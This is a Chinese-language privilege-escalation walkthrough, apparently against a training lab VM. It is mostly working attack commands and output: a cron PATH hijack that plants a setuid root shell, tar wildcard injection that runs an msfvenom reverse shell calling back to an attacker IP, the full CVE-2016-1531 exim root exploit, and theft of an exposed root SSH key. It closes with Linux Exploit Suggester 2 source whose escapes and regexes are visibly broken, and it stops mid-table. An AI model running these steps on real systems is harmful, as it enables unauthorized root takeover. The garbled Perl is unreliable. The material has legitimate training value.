Linux提权(二)
计划任务——path环境变量
在crontab计划任务中存在PATH变量,且以/home/user开头;而计划任务又以不带路径的方式调用overwrite.sh,cron会按PATH顺序查找,因此用户可写的主目录中的同名文件会被优先找到并以root身份执行。在主目录创建一个overwrite.sh的文件,内容如下:
#!/bin/bash
# Payload placed in /home/user, the first (user-writable) entry of cron's PATH;
# the root cron job invokes overwrite.sh by bare name, so this copy runs as root
# and leaves a setuid/setgid-root copy of bash in /tmp.
# Detection: new setuid files in world-writable directories, and cron PATH
# entries that point at user-writable locations.
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
给文件增加执行权限
chmod +x overwrite.sh
计划任务执行后/tmp会生成一个rootbash执行文件
user@debian:~$ ls -al /tmp
total 1024
drwxrwxrwt 2 root root 4096 Jan 4 21:40 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 94613 Jan 4 21:40 backup.tar.gz
-rwsr-sr-x 1 root root 926536 Jan 4 21:38 rootbash
-rw-r--r-- 1 root root 28 Jan 4 21:37 useless
等待crontab计划任务运行并生成/tmp/rootbash后,再运行/tmp/rootbash
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
计划任务——通配符
在crontab计划任务中还存在另一个文件compress.sh,内容如下:
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~$ cat /usr/local/bin/compress.sh
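#!/bin/sh
# Backup of the user's home directory, run from root's crontab.
# `--` ends option parsing, so a file whose name begins with `-` is archived
# as data instead of being interpreted as a tar option; the unquoted `*`
# still expands to the same set of non-dot entries as before.
# NOTE(review): writing a predictable path under world-writable /tmp as root
# is itself a risk (a pre-created file or symlink at that path is followed);
# the path is kept here so existing consumers of the archive keep working,
# but a root-owned directory would be safer.
# Bail out if the directory is missing rather than archiving the current
# directory by accident.
cd /home/user || exit 1
tar czf /tmp/backup.tar.gz -- *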
在compress.sh文件中tar命令存在通配符(*),根据资料得知tar可用于生成交互式shell突破受限环境(https://gtfobins.github.io/gtfobins/tar/)
使用msf生成一个反向shell ELF文件
┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.2.98.234 LPORT=4444 -f elf -o shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell.elf
使用scp传输文件
scp shell.elf [email protected]:shell.elf
[email protected]'s password:
shell.elf
直接使用scp传输文件会出现错误
scp shell.elf [email protected]:shell.elf
Unable to negotiate with 10.10.46.24 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
scp: Connection closed
这是因为新版OpenSSH客户端默认不再接受ssh-rsa主机密钥算法,而目标只提供ssh-rsa/ssh-dss。在本机的~/.ssh目录下添加config配置文件,内容如下:
HostKeyAlgorithms +ssh-rsa
现在就可以传输文件了
给shell.elf增加执行权限,并在主目录创建两个以tar选项命名的空文件
user@debian:~$ chmod +x shell.elf
user@debian:~$ touch /home/user/--checkpoint=1
user@debian:~$ touch /home/user/--checkpoint-action=exec=shell.elf
当 cron 作业中的 tar 命令运行时,通配符 (*) 将扩展以包含这些文件。由于它们的文件名是有效的 tar 命令行选项,因此 tar 会识别它们并将它们视为命令行选项而不是文件名。防御上,脚本应在通配符前使用 -- 结束选项解析(或写成 ./*),使以 - 开头的文件名只能被当作文件。
kali开启监听
# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.2.98.234] from (UNKNOWN) [10.10.46.24] 39604
id
uid=0(root) gid=0(root) groups=0(root)
已知漏洞
查找所有SUID/SGID可执行文件
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
-rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs
在结果中存在一个/usr/sbin/exim-4.84-3,查询得知此版本存在漏洞可用于提权(https://www.exploit-db.com/exploits/39535)
user@debian:~/tools/suid/exim$ ls
cve-2016-1531.sh
user@debian:~/tools/suid/exim$ cat cve-2016-1531.sh
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" argument -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
#
# Review notes: the root cause is a setuid exim honouring the caller's
# PERL5LIB/PERL5OPT environment when started with -ps, so its embedded perl
# loads a user-supplied module with root privileges. Host artifacts: the
# module written to /tmp/root.pm and a shell spawned from the exim process.
# Mitigation is an exim release that sanitises the environment before
# honouring these options (the affected version is the one listed above).
echo [ CVE-2016-1531 local root exploit
# Module that the embedded interpreter will load (heredoc content is the file).
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
# Point perl's module path at /tmp and pre-load the 'root' package.
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
执行脚本可得到root权限shell
user@debian:~/tools/suid/exim$ ./cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# id
uid=0(root) gid=1000(user) groups=0(root)
历史命令/配置文件
查看历史命令/配置文件或许会有意外收获
cat ~/.*history | less
SSH密钥
在系统根目录下看到存在.ssh的隐藏目录,查看下内容
user@debian:~$ ls -al /
total 96
drwxr-xr-x 22 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
drwxr-xr-x 3 root root 4096 May 12 2017 boot
drwxr-xr-x 12 root root 2820 Jan 5 00:13 dev
drwxr-xr-x 67 root root 4096 Jan 5 01:04 etc
drwxr-xr-x 3 root root 4096 May 15 2017 home
lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14 2017 lib
lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
drwx------ 2 root root 16384 May 12 2017 lost+found
drwxr-xr-x 3 root root 4096 May 12 2017 media
drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
drwxr-xr-x 2 root root 4096 May 12 2017 opt
dr-xr-xr-x 96 root root 0 Jan 5 00:10 proc
drwx------ 5 root root 4096 May 15 2020 root
drwxr-xr-x 2 root root 4096 May 13 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
drwxr-xr-x 2 root root 4096 May 12 2017 srv
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
drwxr-xr-x 13 root root 0 Jan 5 00:10 sys
drwxrwxrwt 2 root root 4096 Jan 5 01:15 tmp
drwxr-xr-x 11 root root 4096 May 13 2017 usr
drwxr-xr-x 14 root root 4096 May 13 2017 var
lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x 2 root root 4096 Aug 25 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rw-r--r-- 1 root root 1679 Aug 25 2019 root_key
存在一个文件root_key,复制文件到kali
┌──(root㉿kali)-[~]
└─# scp -r [email protected]:/.ssh/root_key /
[email protected]'s password:
root_key 100% 1679 2.1KB/s 00:00
┌──(root㉿kali)-[~]
└─# ls -al /
total 1048748
drwxr-xr-x 19 root root 4096 Jan 5 01:51 .
drwxr-xr-x 19 root root 4096 Jan 5 01:51 ..
---s--s--x 1 root root 77304 Dec 28 01:48 agetty
lrwxrwxrwx 1 root root 7 Nov 30 11:35 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Dec 21 22:27 boot
drwxr-xr-x 17 root root 3440 Jan 5 01:26 dev
drwxr-xr-x 183 root root 12288 Jan 5 01:26 etc
drwxr-xr-x 3 root root 4096 Nov 30 11:56 home
lrwxrwxrwx 1 root root 33 Nov 30 14:51 initrd.img -> boot/initrd.img-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 33 Nov 30 14:51 initrd.img.old -> boot/initrd.img-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 7 Nov 30 11:35 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Nov 30 11:48 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Nov 30 11:35 lib64 -> usr/lib64
drwx------ 2 root root 16384 Nov 30 14:46 lost+found
drwxr-xr-x 2 root root 4096 Nov 30 11:35 media
drwxr-xr-x 2 root root 4096 Nov 30 11:35 mnt
drwxr-xr-x 3 root root 4096 Nov 30 11:48 opt
dr-xr-xr-x 298 root root 0 Dec 29 02:06 proc
drwxr-xr-x 15 root root 4096 Jan 3 03:26 redteam
drwx------ 14 root root 4096 Jan 5 01:51 root
-rw-r--r-- 1 root root 1679 Jan 5 01:51 root_key
drwxr-xr-x 33 root root 820 Dec 29 02:07 run
lrwxrwxrwx 1 root root 8 Nov 30 11:35 sbin -> usr/sbin
drwxr-xr-x 3 root root 4096 Nov 30 11:52 srv
-rw------- 1 root root 1073741824 Nov 30 14:50 swapfile
dr-xr-xr-x 13 root root 0 Dec 29 02:06 sys
drwxrwxrwt 18 root root 12288 Jan 5 01:39 tmp
drwxr-xr-x 15 root root 4096 Nov 30 11:48 usr
drwxr-xr-x 12 root root 4096 Dec 14 03:50 var
lrwxrwxrwx 1 root root 30 Nov 30 14:51 vmlinuz -> boot/vmlinuz-6.5.0-kali3-amd64
lrwxrwxrwx 1 root root 30 Nov 30 14:51 vmlinuz.old -> boot/vmlinuz-6.5.0-kali3-amd64
将root_key移动到/root/.ssh目录下并设置权限
┌──(root㉿kali)-[~/.ssh]
└─# ls
config known_hosts known_hosts.old root_key
┌──(root㉿kali)-[~/.ssh]
└─# chmod 600 root_key
使用ssh密钥连接至测试机
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i root_key -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa [email protected]
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
内核漏洞
内核漏洞可能会使系统处于不稳定状态,运行Linux Exploit Suggester 2工具来检测当前系统上潜在的内核漏洞(https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
user@debian:~/tools/kernel-exploits/linux-exploit-suggester-2$ cat linux-exploit-suggester-2.pl
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
# Linux Exploit Suggester 2: match the running (or -k supplied) kernel version
# against a static table of public kernel exploits and list the candidates.
# Options: -k <kernel> override the version, -h help, -d interactive download menu.
# NOTE(review): the ANSI colour sequences and newlines in this listing appear
# to have lost their backslashes (e[00;33m, n); upstream prints "\e[00;33m"
# and "\n". Treat those escapes below as rendering damage, not intended output.
our $VERSION = '2';
my %opts;
# NOTE(review): Getopt::Std::getopts takes a hash reference (\%opts); the
# missing backslash here is presumably the same rendering loss.
getopts( 'k:hd', %opts );
if (exists $opts{h}) {
    usage();
    exit;
};
print_banner();
# $khost is the dotted version string; $is_partial is set when fewer than
# three components were given (e.g. '2.4') and prefix matching should apply.
my ( $khost, $is_partial ) = get_kernel();
print " Local Kernel: e[00;33m$khoste[00mn";
my %exploits = get_exploits();
print ' Searching ' . scalar keys(%exploits) . " exploits...nn";
print " e[1;35mPossible Exploitse[00mn";
my $count = 1;
my @applicable = ();   # matching exploit records, in printed order
# One line per matching exploit; `next EXPLOIT` makes sure an exploit whose
# vuln list contains the kernel more than once is still listed only once.
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
        # Exact match, or prefix match when a partial version was supplied.
        if ( $khost eq $kernel
            or ( $is_partial and index($kernel,$khost) == 0 )
        ) {
            $exploits{$key}{key} = $key;
            push(@applicable, $exploits{$key});
            print " e[00;33m[e[00me[00;31m$counte[00me[00;33m]e[00m ";
            print "e[00;33m$keye[00m";
            print " e[00;33m($kernel)e[00m" if $is_partial;
            my $alt = $exploits{$key}{alt};
            my $cve = $exploits{$key}{cve};
            my $mlw = $exploits{$key}{mil};
            if ( $alt or $cve ) {
                print "n";
            }
            if ( $alt ) { print " Alt: $alt "; }
            if ( $cve ) { print " CVE-$cve"; }
            if ( $mlw ) { print "n Source: $mlw"; }
            print "n";
            $count += 1;
            next EXPLOIT;
        }
    }
}
print "n";
# A version-string match is only a candidate: distribution backports are not
# visible in the version, so hits need confirmation and a miss is not proof.
if (!@applicable) {
    print " No exploits are available for this kernel versionnn";
    exit;
}
# Optional download menu (-d): accepts 'a' for all, or a comma-separated list
# of 1-based indices from the printed list.
if (exists $opts{d}) {
    print " e[1;36mExploit Downloade[00mn";
    print " (Download all: e[00;33m'a'e[00m / Individually: e[00;33m'2,4,5'e[00m ";
    print "/ Exit: e[00;33m^ce[00m)n";
    print " Select exploits to download: ";
    # NOTE(review): EOF on STDIN (<STDIN> returning undef) is not handled; the
    # loop would keep printing "Invalid input" instead of exiting.
    while (1) {
        my $input = <STDIN>;
        $input =~ s/s+//g;   # strip whitespace (upstream: s/\s+//g)
        if ($input =~ /^a$/) {
            my @selected = ();
            for (my $i=1; $i <= scalar @applicable; $i++) {
                push(@selected, $i);
            }
            # download_exploits dereferences two array refs; upstream passes
            # \@selected, \@applicable (backslashes lost in this listing).
            download_exploits(@selected, @applicable);
            last;
        }
        elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
            my @selected = uniq(split(',', $input));
            @selected = sort {$a <=> $b} @selected;
            # Indices must lie within 1..number of listed exploits.
            if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
                download_exploits(@selected, @applicable);
                last;
            }
            else {
                print " e[00;31mInput is out of range.e[00m Select exploits to download: ";
            }
        }
        else {
            print " e[00;31mInvalid input.e[00m Select exploits to download: ";
        }
    }
};
exit;
######################
## extra functions ##
######################
# Determine the kernel version to match: -k overrides, otherwise the first
# dash-separated field of `uname -r` (e.g. "2.6.32" from "2.6.32-5-amd64").
# Returns ( $khost, $is_partial ); exits with a message when the version is
# not dotted-decimal. Reads the script-level %opts.
sub get_kernel {
    my $khost = '';
    if ( exists $opts{k} ) {
        $khost = $opts{k};
    }
    else {
        # Shell pipeline; `cut` drops the "-<abi>-<flavour>" suffix.
        $khost = `uname -r |cut -d"-" -f1`;
        chomp $khost;
    }
    # Accept only digits separated by single dots.
    if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
        print " e[00;31mSpecified kernel is in the wrong formate[00mn";
        print " Try a kernel format like this: 3.2.0nn";
        exit;
    }
    # partial kernels might be provided by the user,
    # such as '2.4' or '2.6.'
    # With the intended regex, fewer than two dots => partial, and the caller
    # switches to prefix matching.
    # NOTE(review): the regex as listed reads /^d+.d+.d?/; upstream is
    # presumably /^\d+\.\d+\.\d?/ with the backslashes lost in rendering.
    my $is_partial = $khost =~ /^d+.d+.d?/ ? 0 : 1;
    return ( $khost, $is_partial );
}
# Download the selected exploits' source from exploit-db.
#   $sref: ref to the list of 1-based indices chosen by the user
#   $aref: ref to @applicable (records carrying key/mil from get_exploits)
# Only records whose 'mil' URL points at www.exploit-db.com/exploits/<id> are
# fetched (from the /raw/<id> endpoint) into ./exploit_<key>; others are
# skipped with a message. No meaningful return value.
# NOTE(review): wget's exit status is ignored and nothing verifies what was
# downloaded (no checksum); whatever lands in exploit_<key> should be read
# before it is compiled or run.
sub download_exploits {
    my ($sref, $aref) = @_;
    my @selected = @{ $sref };
    my @applicable = @{ $aref };
    my $exploit_base = "www.exploit-db.com/exploits";
    my $download_base = "https://www.exploit-db.com/raw/";
    print "n";
    foreach my $num (@selected) {
        my $mil = $applicable[$num-1]{mil};
        next if (!defined $mil);
        # The trailing numeric path component of the URL is the exploit-db id.
        # (Listed as /^.*/([1-9][0-9]*)/?$/; the inner slashes are presumably
        # escaped upstream, since an unescaped slash would end the pattern.)
        my ($exploit_num) = ($mil =~ /^.*/([1-9][0-9]*)/?$/);
        if ($exploit_num && index($mil, $exploit_base) != -1) {
            my $url = $download_base . $exploit_num;
            my $file = "exploit_$applicable[$num-1]{key}";
            print " Downloading e[00;33m$urle[00m -> e[00;33m$filee[00mn";
            # Single-string system() goes through the shell; $url and $file are
            # derived from the static table (digits + fixed key), not user input.
            system "wget $url -O $file > /dev/null 2>&1";
        }
        else {
            print " No exploit code available for e[00;33m$applicable[$num-1]{key}e[00mn";
        }
    }
    print "n";
}
# Return the elements of @_ with duplicates removed; the first occurrence of
# each value is kept and the original order is preserved. In scalar context
# the count of unique elements is returned.
sub uniq {
    my %seen_before;
    my @unique;
    foreach my $item (@_) {
        push @unique, $item unless $seen_before{$item}++;
    }
    return @unique;
}
# Print the banner followed by the command-line help text to STDOUT.
# $0 (the program name) is interpolated into the usage line.
sub usage {
    print_banner();
    my @help_lines = (
        " e[00;35mUsage:e[00m $0 [-h] [-k kernel] [-d]nn",
        " e[00;33m[e[00me[00;31m-he[00me[00;33m]e[00m Help (this message)n",
        " e[00;33m[e[00me[00;31m-ke[00me[00;33m]e[00m Kernel number (eg. 2.6.28)n",
        " e[00;33m[e[00me[00;31m-de[00me[00;33m]e[00m Open exploit download menunn",
        " You can also provide a partial kernel version (eg. 2.4)n",
        " to see all exploits available.nn",
    );
    print join('', @help_lines);
}
# Print the three-line program banner (rule, title with $VERSION, rule) to STDOUT.
sub print_banner {
    my $rule = "e[00;33m #############################e[00mn";
    print join('',
        "n", $rule,
        "e[1;31m Linux Exploit Suggester $VERSIONe[00mn",
        $rule, "n",
    );
}
# Static exploit table keyed by nickname. Each record may carry:
#   vuln => list of exact kernel version strings the exploit is known against
#   cve  => CVE id without the "CVE-" prefix (may be 'n/a' / 'NA')
#   mil  => public source URL (or free text), consumed by download_exploits
#   alt  => alternate names, printed after the key
# Matching is by version string only (see the main loop), so it cannot see
# distribution backports: a hit is a candidate to verify, not a confirmed
# vulnerability, and a miss is not proof the kernel is patched.
# NOTE(review): several vuln lists repeat entries (msr '2.6.27', dirty_cow and
# exploit_x '2.6.27', clone_newuser '3.0.1', most of timeoutpwn); harmless,
# since the main loop stops at the first hit per exploit.
sub get_exploits {
    return (
        'w00t' => {
            vuln => [
                '2.4.10', '2.4.16', '2.4.17', '2.4.18',
                '2.4.19', '2.4.20', '2.4.21',
            ]
        },
        'brk' => {
            vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
        },
        'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
        'elflbl' => {
            vuln => ['2.4.29'],
            mil => 'http://www.exploit-db.com/exploits/744',
        },
        'elfdump' => { vuln => ['2.4.27'] },
        'elfcd' => { vuln => ['2.6.12'] },
        'expand_stack' => { vuln => ['2.4.29'] },
        'h00lyshit' => {
            vuln => [
                '2.6.8', '2.6.10', '2.6.11', '2.6.12',
                '2.6.13', '2.6.14', '2.6.15', '2.6.16',
            ],
            cve => '2006-3626',
            mil => 'http://www.exploit-db.com/exploits/2013',
        },
        'kdump' => { vuln => ['2.6.13'] },
        'km2' => { vuln => [ '2.4.18', '2.4.22' ] },
        'krad' =>
        { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
        'krad3' => {
            vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
            mil => 'http://exploit-db.com/exploits/1397',
        },
        'local26' => { vuln => ['2.6.13'] },
        'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
        'mremap_pte' => {
            # NOTE(review): '2.2.24' looks like a typo for '2.4.24' — verify upstream.
            vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
            mil => 'http://www.exploit-db.com/exploits/160',
        },
        'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
        'ong_bak' => { vuln => ['2.6.5'] },
        'ptrace' =>
        { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
        'ptrace_kmod' => {
            vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
            cve => '2007-4573',
        },
        'ptrace_kmod2' => {
            vuln => [
                '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
                '2.6.32', '2.6.33', '2.6.34',
            ],
            alt => 'ia32syscall,robert_you_suck',
            mil => 'http://www.exploit-db.com/exploits/15023',
            cve => '2010-3301',
        },
        'ptrace24' => { vuln => ['2.4.9'] },
        'pwned' => { vuln => ['2.6.11'] },
        'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
        'raptor_prctl' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            cve => '2006-2451',
            mil => 'http://www.exploit-db.com/exploits/2031',
        },
        'prctl' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil => 'http://www.exploit-db.com/exploits/2004',
        },
        'prctl2' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil => 'http://www.exploit-db.com/exploits/2005',
        },
        'prctl3' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil => 'http://www.exploit-db.com/exploits/2006',
        },
        'prctl4' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil => 'http://www.exploit-db.com/exploits/2011',
        },
        'remap' => { vuln => ['2.4'] },
        'rip' => { vuln => ['2.2'] },
        'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
        'uselib24' => {
            vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
        },
        'newsmp' => { vuln => ['2.6'] },
        'smpracer' => { vuln => ['2.4.29'] },
        'loginx' => { vuln => ['2.4.22'] },
        'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
        'vmsplice1' => {
            vuln => [
                '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
                '2.6.23', '2.6.24', '2.6.24.1',
            ],
            alt => 'jessica biel',
            cve => '2008-0600',
            mil => 'http://www.exploit-db.com/exploits/5092',
        },
        'vmsplice2' => {
            vuln => [ '2.6.23', '2.6.24' ],
            alt => 'diane_lane',
            cve => '2008-0600',
            mil => 'http://www.exploit-db.com/exploits/5093',
        },
        'vconsole' => {
            vuln => ['2.6'],
            cve => '2009-1046',
        },
        'sctp' => {
            vuln => ['2.6.26'],
            cve => '2008-4113',
        },
        'ftrex' => {
            vuln => [
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
                '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            ],
            cve => '2008-4210',
            mil => 'http://www.exploit-db.com/exploits/6851',
        },
        'exit_notify' => {
            vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
            mil => 'http://www.exploit-db.com/exploits/8369',
        },
        'udev' => {
            vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
            alt => 'udev <1.4.1',
            cve => '2009-1185',
            mil => 'http://www.exploit-db.com/exploits/8478',
        },
        'sock_sendpage2' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
                '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
                '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
                '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
                '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
                '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
                '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
                '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
                '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
                '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
                '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
            ],
            alt => 'proto_ops',
            cve => '2009-2692',
            mil => 'http://www.exploit-db.com/exploits/9436',
        },
        'sock_sendpage' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
                '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
                '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
                '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
                '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
                '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1',
                '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7',
                '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13',
                '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
                '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
                '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
            ],
            alt => 'wunderbar_emporium',
            cve => '2009-2692',
            mil => 'http://www.exploit-db.com/exploits/9435',
        },
        'udp_sendmsg_32bit' => {
            vuln => [
                '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6',
                '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12',
                '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
                '2.6.19',
            ],
            cve => '2009-2698',
            mil =>
            'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
        },
        'pipe.c_32bit' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9',
                '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
                '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
